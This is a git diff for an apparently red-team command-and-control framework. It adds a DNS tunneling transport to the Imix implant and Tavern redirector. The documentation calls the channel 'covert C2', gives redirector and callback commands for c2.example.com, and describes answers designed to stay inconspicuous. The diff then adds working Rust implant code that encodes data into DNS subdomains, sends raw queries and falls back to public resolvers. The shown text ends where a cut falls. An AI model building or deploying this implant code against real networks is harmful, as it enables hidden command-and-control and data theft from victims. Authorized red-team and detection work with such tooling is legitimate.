diff --git a/docs/_docs/admin-guide/tavern.md b/docs/_docs/admin-guide/tavern.md index 66f4d99c9..01ef40c5c 100644 --- a/docs/_docs/admin-guide/tavern.md +++ b/docs/_docs/admin-guide/tavern.md @@ -104,7 +104,74 @@ Below are some deployment gotchas and notes that we try to address with Terrafor ## Redirectors -By default Tavern only supports GRPC connections directly to the server. To Enable additional protocols or additional IPs / Domain names in your callbacks utilize tavern redirectors which recieve traffic using a specific protocol like HTTP/1.1 and then forward it to an upstream tavern server over GRPC. See: `tavern redirector -help` +By default Tavern only supports gRPC connections directly to the server. To enable additional protocols or additional IPs/domain names in your callbacks, utilize Tavern redirectors which receive traffic using a specific protocol (like HTTP/1.1 or DNS) and then forward it to an upstream Tavern server over gRPC. + +### Available Redirectors + +Realm includes three built-in redirector implementations: + +- **`grpc`** - Direct gRPC passthrough redirector +- **`http1`** - HTTP/1.1 to gRPC redirector +- **`dns`** - DNS to gRPC redirector + +### Basic Usage + +List available redirectors: + +```bash +tavern redirector list +``` + +Start a redirector: + +```bash +tavern redirector --transport --listen +``` + +### HTTP/1.1 Redirector + +The HTTP/1.1 redirector accepts HTTP/1.1 traffic from agents and forwards it to an upstream gRPC server. + +```bash +# Start HTTP/1.1 redirector on port 8080 +tavern redirector --transport http1 --listen ":8080" localhost:8000 +``` + +### DNS Redirector + +The DNS redirector tunnels C2 traffic through DNS queries and responses, providing a covert communication channel. It supports TXT, A, and AAAA record types. + +```bash +# Start DNS redirector on UDP port 53 for domain c2.example.com +tavern redirector --transport dns --listen "0.0.0.0:53?domain=c2.example.com" localhost:8000 + +# Support multiple domains +tavern redirector --transport dns --listen "0.0.0.0:53?domain=c2.example.com&domain=backup.example.com" localhost:8000 +``` + +**DNS Configuration Requirements:** + +1. Configure your DNS server to delegate queries for your C2 domain to the redirector IP +2. Or run the redirector as your authoritative DNS server for the domain +3. Ensure UDP port 53 is accessible + +**Server Behavior:** + +- **Benign responses**: Non-C2 queries to A records return `0.0.0.0` instead of NXDOMAIN to avoid breaking recursive DNS lookups (e.g., when using Cloudflare as an intermediary) +- **Conversation tracking**: The server tracks up to 10,000 concurrent conversations +- **Timeout management**: Conversations timeout after 15 minutes of inactivity (reduced to 5 minutes when at capacity) +- **Maximum data size**: 50MB per request + +See the [DNS Transport Configuration](/user-guide/imix#dns-transport-configuration) section in the Imix user guide for more details on agent-side configuration. + +### gRPC Redirector + +The gRPC redirector provides a passthrough for gRPC traffic, useful for deploying multiple Tavern endpoints or load balancing. + +```bash +# Start gRPC redirector on port 9000 +tavern redirector --transport grpc --listen ":9000" localhost:8000 +``` ## Configuration diff --git a/docs/_docs/dev-guide/imix.md b/docs/_docs/dev-guide/imix.md index ae766e0b1..bea5aa0a4 100644 --- a/docs/_docs/dev-guide/imix.md +++ b/docs/_docs/dev-guide/imix.md @@ -91,29 +91,45 @@ pub use mac_address::MacAddress; ## Develop a New Transport -We've tried to make Imix super extensible for transport development. In fact, all of the transport specific logic is complete abstracted from how Imix operates for callbacks/tome excution. For Imix all Transports live in the `realm/implants/lib/transport/src` directory. +We've tried to make Imix super extensible for transport development. In fact, all of the transport specific logic is completely abstracted from how Imix operates for callbacks/tome execution. For Imix all Transports live in the `realm/implants/lib/transport/src` directory. -If creating a new Transport create a new file in the directory and name it after the protocol you plan to use. For example, if writing a DNS Transport then call your file `dns.rs`. Then define your public struct where any connection state/clients will be. For example, +### Current Available Transports + +Realm currently includes three transport implementations: + +- **`grpc`** - Default gRPC transport (with optional DoH support via `grpc-doh` feature) +- **`http1`** - HTTP/1.1 transport +- **`dns`** - DNS-based covert channel transport + +**Note:** Only one transport may be selected at compile time. The build will fail if multiple transport features are enabled simultaneously. + +### Creating a New Transport + +If creating a new Transport, create a new file in the `realm/implants/lib/transport/src` directory and name it after the protocol you plan to use. For example, if writing a new protocol called "Custom" then call your file `custom.rs`. Then define your public struct where any connection state/clients will be stored. For example, ```rust #[derive(Debug, Clone)] -pub struct DNS { - dns_client: Option +pub struct Custom { + // Your connection state here + // e.g., client: Option } ``` -NOTE: Depending on the struct you build, you may need to derive certain features, see above we derive `Debug` and `Clone`. +**NOTE:** Your struct **must** derive `Clone` and `Send` as these are required by the Transport trait. Deriving `Debug` is also recommended for troubleshooting. Next, we need to implement the Transport trait for our new struct. This will look like: ```rust -impl Transport for DNS { +impl Transport for Custom { fn init() -> Self { - DNS{ dns_client: None } + Custom { + // Initialize your connection state here + // e.g., client: None + } } fn new(callback: String, proxy_uri: Option) -> Result { // TODO: setup connection/client hook in proxy, anything else needed - // before fuctions get called. + // before functions get called. Err(anyhow!("Unimplemented!")) } async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { @@ -169,20 +185,35 @@ impl Transport for DNS { NOTE: Be Aware that currently `reverse_shell` uses tokio's sender/reciever while the rest of the methods rely on mpsc's. This is an artifact of some implementation details under the hood of Imix. Some day we may wish to move completely over to tokio's but currenlty it would just result in performance loss/less maintainable code. -After you implement all the functions/write in a decent error message for operators to understand why the function call failed then you need to import the Transport to the broader lib scope. To do this open up `realm/implants/lib/transport/src/lib.rs` and add in your new Transport like so: +After you implement all the functions and write descriptive error messages for operators to understand why function calls failed, you need to: -```rust -// more stuff above +#### 1. Add Compile-Time Exclusivity Checks -#[cfg(feature = "dns")] -mod dns; -#[cfg(feature = "dns")] -pub use dns::DNS as ActiveTransport; +In `realm/implants/lib/transport/src/lib.rs`, add compile-time checks to ensure your new transport cannot be compiled alongside others: -// more stuff below +```rust +// Add your transport to the mutual exclusivity checks +#[cfg(all(feature = "grpc", feature = "custom"))] +compile_error!("only one transport may be selected"); +#[cfg(all(feature = "http1", feature = "custom"))] +compile_error!("only one transport may be selected"); +#[cfg(all(feature = "dns", feature = "custom"))] +compile_error!("only one transport may be selected"); + +// ... existing checks above ... + +// Add your transport module and export +#[cfg(feature = "custom")] +mod custom; +#[cfg(feature = "custom")] +pub use custom::Custom as ActiveTransport; ``` -Also add your new feature to the Transport Cargo.toml at `realm/implants/lib/transport/Cargo.toml`. +**Important:** The transport is exported as `ActiveTransport`, not by its type name. This allows the imix agent code to remain transport-agnostic. + +#### 2. Update Transport Library Dependencies + +Add your new feature and any required dependencies to `realm/implants/lib/transport/Cargo.toml`: ```toml # more stuff above @@ -190,23 +221,65 @@ Also add your new feature to the Transport Cargo.toml at `realm/implants/lib/tra [features] default = [] grpc = [] -dns = [] # <-- see here +grpc-doh = ["grpc", "dep:hickory-resolver"] +http1 = [] +dns = ["dep:data-encoding", "dep:rand"] +custom = ["dep:your-custom-dependency"] # <-- Add your feature here mock = ["dep:mockall"] +[dependencies] +# ... existing dependencies ... + +# Add any dependencies needed by your transport +your-custom-dependency = { version = "1.0", optional = true } + # more stuff below ``` -Then make sure the feature flag is populated down from the imix crate `realm/implants/imix/Cargo.toml` +#### 3. Enable Your Transport in Imix + +To use your new transport, update the imix Cargo.toml at `realm/implants/imix/Cargo.toml`: + ```toml # more stuff above [features] -default = ["transport/grpc"] +# Check if compiled by imix +win_service = [] +default = ["transport/grpc"] # Default transport http1 = ["transport/http1"] dns = ["transport/dns"] +custom = ["transport/custom"] # <-- Add your feature here transport-grpc-doh = ["transport/grpc-doh"] # more stuff below ``` -And that's all that is needed for Imix to use a new Transport! Now all there is to do is setup the Tarver redirector see the [tavern dev docs here](/dev-guide/tavern#transport-development) +#### 4. Build Imix with Your Transport + +Compile imix with your custom transport: + +```bash +# From the repository root +cd implants/imix + +# Build with your transport feature +cargo build --release --features custom --no-default-features + +# Or for the default transport (grpc) +cargo build --release +``` + +**Important:** Only specify one transport feature at a time. The build will fail if multiple transport features are enabled. Ensure you include `--no-default-features` when building with a non-default transport. + +#### 5. Set Up the Corresponding Redirector + +For your agent to communicate, you'll need to implement a corresponding redirector in Tavern. See the redirector implementations in `tavern/internal/redirectors/` for examples: + +- `tavern/internal/redirectors/grpc/` - gRPC redirector +- `tavern/internal/redirectors/http1/` - HTTP/1.1 redirector +- `tavern/internal/redirectors/dns/` - DNS redirector + +Your redirector must implement the `Redirector` interface and register itself in the redirector registry. See `tavern/internal/redirectors/redirector.go` for the interface definition. + +And that's all that is needed for Imix to use a new Transport! The agent code automatically uses whichever transport is enabled at compile time via the `ActiveTransport` type alias. diff --git a/docs/_docs/user-guide/imix.md b/docs/_docs/user-guide/imix.md index 04e5f1cc1..3c1bca382 100644 --- a/docs/_docs/user-guide/imix.md +++ b/docs/_docs/user-guide/imix.md @@ -18,7 +18,7 @@ Building in the dev container limits variables that might cause issues and is th | Env Var | Description | Default | Required | | ------- | ----------- | ------- | -------- | -| IMIX_CALLBACK_URI | URI for initial callbacks (must specify a scheme, e.g. `http://`) | `http://127.0.0.1:8000` | No | +| IMIX_CALLBACK_URI | URI for initial callbacks (must specify a scheme, e.g. `http://` or `dns://`) | `http://127.0.0.1:8000` | No | | IMIX_SERVER_PUBKEY | The public key for the tavern server (obtain from server using `curl $IMIX_CALLBACK_URI/status`). | automatic | Yes | | IMIX_CALLBACK_INTERVAL | Duration between callbacks, in seconds. | `5` | No | | IMIX_RETRY_INTERVAL | Duration to wait before restarting the agent loop if an error occurs, in seconds. | `5` | No | @@ -33,6 +33,65 @@ Imix has run-time configuration, that may be specified using environment variabl | IMIX_BEACON_ID | The identifier to be used during callback (must be globally unique) | Random UUIDv4 | No | | IMIX_LOG | Log message level for debug builds. See below for more information. | INFO | No | +## DNS Transport Configuration + +The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either specific DNS servers or the system's default resolver with automatic fallback. + +### DNS URI Format + +When using the DNS transport, configure `IMIX_CALLBACK_URI` with the following format: + +``` +dns://?domain=[&type=] +``` + +**Parameters:** +- `` - DNS server address(es), `*` to use system resolver, or comma-separated list (e.g., `8.8.8.8:53,1.1.1.1:53`) +- `domain` - Base domain for DNS queries (e.g., `c2.example.com`) +- `type` (optional) - DNS record type: `txt` (default), `a`, or `aaaa` + +**Examples:** + +```bash +# Use specific DNS server with TXT records (default) +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com" + +# Use system resolver with fallbacks +export IMIX_CALLBACK_URI="dns://*?domain=c2.example.com" + +# Use multiple DNS servers with A records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53,1.1.1.1:53?domain=c2.example.com&type=a" + +# Use AAAA records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com&type=aaaa" +``` + +### DNS Resolver Fallback + +When using `*` as the server, the agent uses system DNS servers followed by public resolvers (1.1.1.1, 8.8.8.8) as fallbacks. If system configuration cannot be read, only the public resolvers are used. When multiple servers are configured, the agent tries each server in order on every failed request until one succeeds, then uses the working server for subsequent requests. + +### Record Types + +| Type | Description | Use Case | +|------|-------------|----------| +| TXT | Text records (default) | Best throughput, data encoded in TXT RDATA | +| A | IPv4 address records | Lower profile, data encoded across multiple A records | +| AAAA | IPv6 address records | Medium profile, more data per record than A | + +### Protocol Details + +The DNS transport uses an async windowed protocol to handle UDP unreliability: + +- **Chunked transmission**: Large requests are split into chunks that fit within DNS query limits (253 bytes total domain length) +- **Windowed sending**: Up to 10 packets are sent concurrently +- **ACK/NACK protocol**: The server responds with acknowledgments for received chunks and requests retransmission of missing chunks +- **Automatic retries**: Failed chunks are retried up to 3 times before the request fails +- **CRC32 verification**: Data integrity is verified using CRC32 checksums + +**Limits:** +- Maximum data size: 50MB per request +- Maximum concurrent conversations on server: 10,000 + ## Logging At runtime, you may use the `IMIX_LOG` environment variable to control log levels and verbosity. See [these docs](https://docs.rs/pretty_env_logger/latest/pretty_env_logger/) for more information. **When building a release version of imix, logging is disabled** and is not included in the released binary. @@ -100,6 +159,7 @@ These flags are passed to cargo build Eg.: - `--features grpc-doh` - Enable DNS over HTTP using cloudflare DNS for the grpc transport - `--features http1 --no-default-features` - Changes the default grpc transport to use HTTP/1.1. Requires running the http redirector. +- `--features dns --no-default-features` - Changes the default grpc transport to use DNS. Requires running the dns redirector. See the [DNS Transport Configuration](#dns-transport-configuration) section for more information on how to configure the DNS transport URI. ## Setting encryption key diff --git a/implants/Cargo.toml b/implants/Cargo.toml index 32d1f3a3c..9c40bb378 100644 --- a/implants/Cargo.toml +++ b/implants/Cargo.toml @@ -61,6 +61,7 @@ anyhow = "1.0.65" assert_cmd = "2.0.6" async-recursion = "1.0.0" async-trait = "0.1.68" +base32 = "0.5" base64 = "0.21.4" chrono = "0.4.34" const-decoder = "0.3.0" @@ -126,6 +127,7 @@ tonic-build = { git = "https://github.com/hyperium/tonic.git", rev = "c783652" } trait-variant = "0.1.1" uuid = "1.5.0" static_vcruntime = "2.0" +url = "2.5" which = "4.4.2" whoami = { version = "1.5.1", default-features = false } windows-service = "0.6.0" diff --git a/implants/imix/Cargo.toml b/implants/imix/Cargo.toml index 2c313dc88..1b978749a 100644 --- a/implants/imix/Cargo.toml +++ b/implants/imix/Cargo.toml @@ -11,6 +11,7 @@ crate-type = ["cdylib"] win_service = [] default = ["transport/grpc"] http1 = ["transport/http1"] +dns = ["transport/dns"] transport-grpc-doh = ["transport/grpc-doh"] [dependencies] diff --git a/implants/imixv2/Cargo.toml b/implants/imixv2/Cargo.toml index b531ad720..79ebdd8c9 100644 --- a/implants/imixv2/Cargo.toml +++ b/implants/imixv2/Cargo.toml @@ -7,9 +7,10 @@ edition = "2024" crate-type = ["cdylib"] [features] -default = ["install", "grpc", "http1"] +default = ["install", "grpc", "http1", "dns"] grpc = ["transport/grpc"] http1 = ["transport/http1"] +dns = ["transport/dns"] win_service = [] install = [] diff --git a/implants/lib/pb/Cargo.toml b/implants/lib/pb/Cargo.toml index f5a8b4ae6..10a0fa1d4 100644 --- a/implants/lib/pb/Cargo.toml +++ b/implants/lib/pb/Cargo.toml @@ -8,6 +8,7 @@ default = [] imix = [] grpc = [] http1 = [] +dns = [] [dependencies] diff --git a/implants/lib/pb/build.rs b/implants/lib/pb/build.rs index cfff81dac..5acc469bd 100644 --- a/implants/lib/pb/build.rs +++ b/implants/lib/pb/build.rs @@ -109,5 +109,19 @@ fn main() -> Result<(), Box> { Ok(_) => println!("generated c2 protos"), }; + // Build DNS Protos (no encryption codec - used for transport layer only) + match tonic_build::configure() + .out_dir("./src/generated") + .build_server(false) + .build_client(false) + .compile(&["dns.proto"], &["../../../tavern/internal/c2/proto/"]) + { + Err(err) => { + println!("WARNING: Failed to compile dns protos: {}", err); + panic!("{}", err); + } + Ok(_) => println!("generated dns protos"), + }; + Ok(()) } diff --git a/implants/lib/pb/src/config.rs b/implants/lib/pb/src/config.rs index ef9a694f4..b0a8b2e57 100644 --- a/implants/lib/pb/src/config.rs +++ b/implants/lib/pb/src/config.rs @@ -2,6 +2,7 @@ use tonic::transport; use uuid::Uuid; use crate::c2::beacon::Transport; + /// Config holds values necessary to configure an Agent. #[allow(clippy::derive_partial_eq_without_eq)] #[derive(Clone, PartialEq, ::prost::Message)] @@ -105,11 +106,13 @@ impl Config { let beacon_id = std::env::var("IMIX_BEACON_ID").unwrap_or_else(|_| String::from(Uuid::new_v4())); + #[cfg(feature = "dns")] + let transport = crate::c2::beacon::Transport::Dns; #[cfg(feature = "http1")] let transport = crate::c2::beacon::Transport::Http1; #[cfg(feature = "grpc")] let transport = crate::c2::beacon::Transport::Grpc; - #[cfg(not(any(feature = "http1", feature = "grpc")))] + #[cfg(not(any(feature = "dns", feature = "http1", feature = "grpc")))] let transport = crate::c2::beacon::Transport::Unspecified; let info = crate::c2::Beacon { diff --git a/implants/lib/pb/src/generated/c2.rs b/implants/lib/pb/src/generated/c2.rs index 853ee8285..816200dd5 100644 --- a/implants/lib/pb/src/generated/c2.rs +++ b/implants/lib/pb/src/generated/c2.rs @@ -42,6 +42,7 @@ pub mod beacon { Unspecified = 0, Grpc = 1, Http1 = 2, + Dns = 3, } impl Transport { /// String value of the enum field names used in the ProtoBuf definition. @@ -53,6 +54,7 @@ pub mod beacon { Transport::Unspecified => "TRANSPORT_UNSPECIFIED", Transport::Grpc => "TRANSPORT_GRPC", Transport::Http1 => "TRANSPORT_HTTP1", + Transport::Dns => "TRANSPORT_DNS", } } /// Creates an enum from field names used in the ProtoBuf definition. @@ -61,6 +63,7 @@ pub mod beacon { "TRANSPORT_UNSPECIFIED" => Some(Self::Unspecified), "TRANSPORT_GRPC" => Some(Self::Grpc), "TRANSPORT_HTTP1" => Some(Self::Http1), + "TRANSPORT_DNS" => Some(Self::Dns), _ => None, } } diff --git a/implants/lib/pb/src/generated/dns.rs b/implants/lib/pb/src/generated/dns.rs new file mode 100644 index 000000000..7797109c5 --- /dev/null +++ b/implants/lib/pb/src/generated/dns.rs @@ -0,0 +1,125 @@ +// This file is @generated by prost-build. +/// DNSPacket is the main message format for DNS C2 communication +/// It is serialized to protobuf, then encoded (Base64/Base58/Base32), and sent as DNS subdomain +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct DnsPacket { + /// Packet type + #[prost(enumeration = "PacketType", tag = "1")] + pub r#type: i32, + /// Chunk sequence number (0-Based for INIT, 1-based for DATA) + #[prost(uint32, tag = "2")] + pub sequence: u32, + /// 8-character random conversation ID + #[prost(string, tag = "3")] + pub conversation_id: ::prost::alloc::string::String, + /// Chunk payload (or InitPayload for INIT packets) + #[prost(bytes = "vec", tag = "4")] + pub data: ::prost::alloc::vec::Vec, + /// Optional CRC32 for validation + #[prost(uint32, tag = "5")] + pub crc32: u32, + /// Async protocol fields for windowed transmission + /// + /// Number of packets client has in-flight + #[prost(uint32, tag = "6")] + pub window_size: u32, + /// Ranges of successfully received chunks (SACK) + #[prost(message, repeated, tag = "7")] + pub acks: ::prost::alloc::vec::Vec, + /// Specific sequence numbers to retransmit + #[prost(uint32, repeated, tag = "8")] + pub nacks: ::prost::alloc::vec::Vec, +} +/// AckRange represents a contiguous range of acknowledged sequence numbers +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct AckRange { + /// Inclusive start of range + #[prost(uint32, tag = "1")] + pub start_seq: u32, + /// Inclusive end of range + #[prost(uint32, tag = "2")] + pub end_seq: u32, +} +/// InitPayload is the payload for INIT packets +/// It contains metadata about the upcoming data transmission +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct InitPayload { + /// 2-character gRPC method code (e.g., "ct", "fa") + #[prost(string, tag = "1")] + pub method_code: ::prost::alloc::string::String, + /// Total number of data chunks to expect + #[prost(uint32, tag = "2")] + pub total_chunks: u32, + /// CRC32 checksum of complete request data + #[prost(uint32, tag = "3")] + pub data_crc32: u32, + /// Total size of the file/data in bytes + #[prost(uint32, tag = "4")] + pub file_size: u32, +} +/// FetchPayload is the payload for FETCH packets +/// It specifies which response chunk to retrieve +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct FetchPayload { + /// Which chunk to fetch (1-based) + #[prost(uint32, tag = "1")] + pub chunk_index: u32, +} +/// ResponseMetadata indicates the response is chunked and must be fetched +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct ResponseMetadata { + /// Total number of response chunks + #[prost(uint32, tag = "1")] + pub total_chunks: u32, + /// CRC32 checksum of complete response data + #[prost(uint32, tag = "2")] + pub data_crc32: u32, + /// Size of each chunk (last may be smaller) + #[prost(uint32, tag = "3")] + pub chunk_size: u32, +} +/// PacketType defines the type of DNS packet in the conversation +#[derive(Clone, Copy, Debug, PartialEq, Eq, Hash, PartialOrd, Ord, ::prost::Enumeration)] +#[repr(i32)] +pub enum PacketType { + Unspecified = 0, + /// Establish conversation + Init = 1, + /// Send data chunk + Data = 2, + /// Retrieve response chunk + Fetch = 3, + /// Server status response with ACKs/NACKs + Status = 4, +} +impl PacketType { + /// String value of the enum field names used in the ProtoBuf definition. + /// + /// The values are not transformed in any way and thus are considered stable + /// (if the ProtoBuf definition does not change) and safe for programmatic use. + pub fn as_str_name(&self) -> &'static str { + match self { + PacketType::Unspecified => "PACKET_TYPE_UNSPECIFIED", + PacketType::Init => "PACKET_TYPE_INIT", + PacketType::Data => "PACKET_TYPE_DATA", + PacketType::Fetch => "PACKET_TYPE_FETCH", + PacketType::Status => "PACKET_TYPE_STATUS", + } + } + /// Creates an enum from field names used in the ProtoBuf definition. + pub fn from_str_name(value: &str) -> ::core::option::Option { + match value { + "PACKET_TYPE_UNSPECIFIED" => Some(Self::Unspecified), + "PACKET_TYPE_INIT" => Some(Self::Init), + "PACKET_TYPE_DATA" => Some(Self::Data), + "PACKET_TYPE_FETCH" => Some(Self::Fetch), + "PACKET_TYPE_STATUS" => Some(Self::Status), + _ => None, + } + } +} diff --git a/implants/lib/pb/src/lib.rs b/implants/lib/pb/src/lib.rs index f65dc9036..a1c4efaea 100644 --- a/implants/lib/pb/src/lib.rs +++ b/implants/lib/pb/src/lib.rs @@ -4,5 +4,8 @@ pub mod eldritch { pub mod c2 { include!("generated/c2.rs"); } +pub mod dns { + include!("generated/dns.rs"); +} pub mod config; pub mod xchacha; diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index e92cc091a..6f52aaad0 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -8,6 +8,7 @@ default = [] grpc = ["pb/grpc"] grpc-doh = ["grpc", "dep:hickory-resolver"] http1 = ["pb/http1"] +dns = ["dep:base32", "dep:rand", "dep:hickory-resolver", "dep:url"] mock = ["dep:mockall"] [dependencies] @@ -15,6 +16,7 @@ pb = { workspace = true } anyhow = { workspace = true } bytes = { workspace = true } +futures = { workspace = true } log = { workspace = true } prost = { workspace = true } prost-types = { workspace = true } @@ -27,6 +29,9 @@ hyper = { version = "0.14", features = [ ] } # Had to user an older version of hyper to support hyper-proxy hyper-proxy = {version = "0.9.1", default-features = false, features = ["rustls"]} hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = true } +base32 = { workspace = true, optional = true } +rand = { workspace = true, optional = true } +url = { workspace = true, optional = true } # [feature = mock] mockall = { workspace = true, optional = true } diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs new file mode 100644 index 000000000..cef8ece3b --- /dev/null +++ b/implants/lib/transport/src/dns.rs @@ -0,0 +1,1603 @@ +use crate::Transport; +use anyhow::{Context, Result}; +use pb::c2::*; +use pb::dns::*; +use prost::Message; +use std::sync::mpsc::{Receiver, Sender}; +use tokio::net::UdpSocket; + +// Protocol limits +const MAX_LABEL_LENGTH: usize = 63; +const MAX_DNS_NAME_LENGTH: usize = 253; +const CONV_ID_LENGTH: usize = 8; +const DNS_RESPONSE_BUF_SIZE: usize = 4096; + +// Async protocol configuration +const SEND_WINDOW_SIZE: usize = 10; // Packets in flight +const MAX_RETRIES_PER_CHUNK: u32 = 3; // Max retries for a chunk +const MAX_DATA_SIZE: usize = 50 * 1024 * 1024; // 50MB max data size + +// DNS resolver fallbacks +const FALLBACK_DNS_SERVERS: &[&str] = &["1.1.1.1:53", "8.8.8.8:53"]; + +/// DNS record type for queries +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum DnsRecordType { + TXT, // Text records (default, base32 encoded) + A, // IPv4 address records (binary data) + AAAA, // IPv6 address records (binary data) +} + +/// DNS transport using stateless packet protocol with protobuf +#[derive(Debug, Clone)] +pub struct DNS { + base_domain: String, + dns_servers: Vec, // Primary + fallback DNS servers + current_server_index: usize, + record_type: DnsRecordType, // DNS record type to use for queries +} + +impl DNS { + /// Marshal request using ChaCha encoding + fn marshal_with_codec(msg: Req) -> Result> + where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, + { + pb::xchacha::encode_with_chacha::(msg) + } + + /// Unmarshal response using ChaCha encoding + fn unmarshal_with_codec(data: &[u8]) -> Result + where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, + { + pb::xchacha::decode_with_chacha::(data) + } + + /// Generate unique conversation ID + fn generate_conv_id() -> String { + use rand::Rng; + const CHARSET: &[u8] = b"abcdefghijklmnopqrstuvwxyz0123456789"; + let mut rng = rand::thread_rng(); + (0..CONV_ID_LENGTH) + .map(|_| { + let idx = rng.gen_range(0..CHARSET.len()); + CHARSET[idx] as char + }) + .collect() + } + + /// Calculate CRC32 checksum + fn calculate_crc32(data: &[u8]) -> u32 { + let mut crc = 0xffffffffu32; + for &byte in data { + crc ^= byte as u32; + for _ in 0..8 { + if crc & 1 != 0 { + crc = (crc >> 1) ^ 0xedb88320; + } else { + crc >>= 1; + } + } + } + !crc + } + + /// Calculate maximum data size that will fit in DNS query + fn calculate_max_chunk_size(&self, total_chunks: u32) -> usize { + // DNS limit: total_length <= 253 + // Format: ...... + // total_length = encoded_length + ceil(encoded_length / 63) + base_domain_length + + let base_domain_len = self.base_domain.len(); + let available = MAX_DNS_NAME_LENGTH.saturating_sub(base_domain_len); + + // Calculate max encoded length where: encoded + ceil(encoded/63) <= available + // For n complete labels (63 chars each): n*63 + n = n*64 + // So: floor(available / 64) * 63 gives us the safe amount + let complete_labels = available / 64; + let max_encoded_length = complete_labels * 63; + + // Base32: 5 bytes protobuf -> 8 chars encoded + // protobuf_length = encoded_length * 5 / 8 + let max_protobuf_length = (max_encoded_length * 5) / 8; + + // Calculate protobuf overhead with worst-case varint sizes + let sample_packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: total_chunks, + conversation_id: "a".repeat(CONV_ID_LENGTH), + data: vec![], + crc32: 0xFFFFFFFF, + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], + }; + + let overhead = sample_packet.encoded_len(); + + // Max data size is what fits after overhead + max_protobuf_length.saturating_sub(overhead) + } + + /// Encode data using Base32 (DNS-safe, case-insensitive) + fn encode_data(data: &[u8]) -> String { + // Use RFC4648 alphabet (A-Z, 2-7) without padding, converted to lowercase + base32::encode(base32::Alphabet::Rfc4648 { padding: false }, data).to_lowercase() + } + + /// Build DNS query subdomain from packet + /// Format: . + /// Base32 data is split into 63-char labels, total length <= 253 chars + fn build_subdomain(&self, packet: &DnsPacket) -> Result { + // Serialize packet to protobuf + let mut buf = Vec::new(); + packet.encode(&mut buf)?; + + // Encode entire packet as Base32 (includes all metadata) + let encoded = Self::encode_data(&buf); + + // Calculate total length + let base_domain_len = self.base_domain.len(); + let num_labels = (encoded.len() + MAX_LABEL_LENGTH - 1) / MAX_LABEL_LENGTH; + let total_len = encoded.len() + num_labels + base_domain_len; // +num_labels for dots between labels, +1 for dot before base_domain + + if total_len > MAX_DNS_NAME_LENGTH { + return Err(anyhow::anyhow!( + "DNS query too long: {} chars (max {}). protobuf={} bytes, encoded={} chars, labels={}, base_domain={} chars. Data in packet was {} bytes.", + total_len, + MAX_DNS_NAME_LENGTH, + buf.len(), + encoded.len(), + num_labels, + base_domain_len, + packet.data.len() + )); + } + + // Split encoded data + let mut labels = Vec::new(); + let mut remaining = encoded.as_str(); + while remaining.len() > MAX_LABEL_LENGTH { + let (chunk, rest) = remaining.split_at(MAX_LABEL_LENGTH); + labels.push(chunk); + remaining = rest; + } + if !remaining.is_empty() { + labels.push(remaining); + } + + // Build final domain: ..... + labels.push(&self.base_domain); + Ok(labels.join(".")) + } + + /// Send packet and get response with resolver fallback + async fn send_packet(&mut self, packet: DnsPacket) -> Result> { + let subdomain = self.build_subdomain(&packet)?; + let (query, txid) = self.build_dns_query(&subdomain)?; + + // Try each DNS server in order + let mut last_error = None; + for attempt in 0..self.dns_servers.len() { + let server_idx = (self.current_server_index + attempt) % self.dns_servers.len(); + let server = &self.dns_servers[server_idx]; + + match self.try_dns_query(server, &query, txid).await { + Ok(response) => { + // Update current server on success + self.current_server_index = server_idx; + return Ok(response); + } + Err(e) => { + last_error = Some(e); + // Continue to next resolver + } + } + } + + Err(last_error.unwrap_or_else(|| anyhow::anyhow!("all DNS servers failed"))) + } + + /// Try a single DNS query against a specific server + async fn try_dns_query( + &self, + server: &str, + query: &[u8], + expected_txid: u16, + ) -> Result> { + // Create UDP socket with timeout + let socket = UdpSocket::bind("0.0.0.0:0").await?; + socket.connect(server).await?; + + // Send query + socket.send(query).await?; + + // Receive response with timeout + let mut buf = vec![0u8; DNS_RESPONSE_BUF_SIZE]; + let timeout_duration = std::time::Duration::from_secs(5); + let len = tokio::time::timeout(timeout_duration, socket.recv(&mut buf)) + .await + .map_err(|_| anyhow::anyhow!("timeout")) + .context("DNS query timeout")??; + buf.truncate(len); + + // Parse and validate response + self.parse_dns_response(&buf, expected_txid) + } + + /// Build DNS query packet with random transaction ID + fn build_dns_query(&self, domain: &str) -> Result<(Vec, u16)> { + let mut query = Vec::new(); + + // Transaction ID + let txid = rand::random::(); + query.extend_from_slice(&txid.to_be_bytes()); + // Flags: standard query + query.extend_from_slice(&[0x01, 0x00]); + // Questions: 1 + query.extend_from_slice(&[0x00, 0x01]); + // Answer RRs: 0 + query.extend_from_slice(&[0x00, 0x00]); + // Authority RRs: 0 + query.extend_from_slice(&[0x00, 0x00]); + // Additional RRs: 0 + query.extend_from_slice(&[0x00, 0x00]); + + // Question section + for label in domain.split('.') { + if label.is_empty() { + continue; + } + query.push(label.len() as u8); + query.extend_from_slice(label.as_bytes()); + } + query.push(0x00); // End of domain + + // Type and Class based on record_type + match self.record_type { + DnsRecordType::TXT => { + // Type: TXT (16) + query.extend_from_slice(&[0x00, 0x10]); + } + DnsRecordType::A => { + // Type: A (1) + query.extend_from_slice(&[0x00, 0x01]); + } + DnsRecordType::AAAA => { + // Type: AAAA (28) + query.extend_from_slice(&[0x00, 0x1c]); + } + } + // Class: IN (1) + query.extend_from_slice(&[0x00, 0x01]); + + Ok((query, txid)) + } + + /// Parse 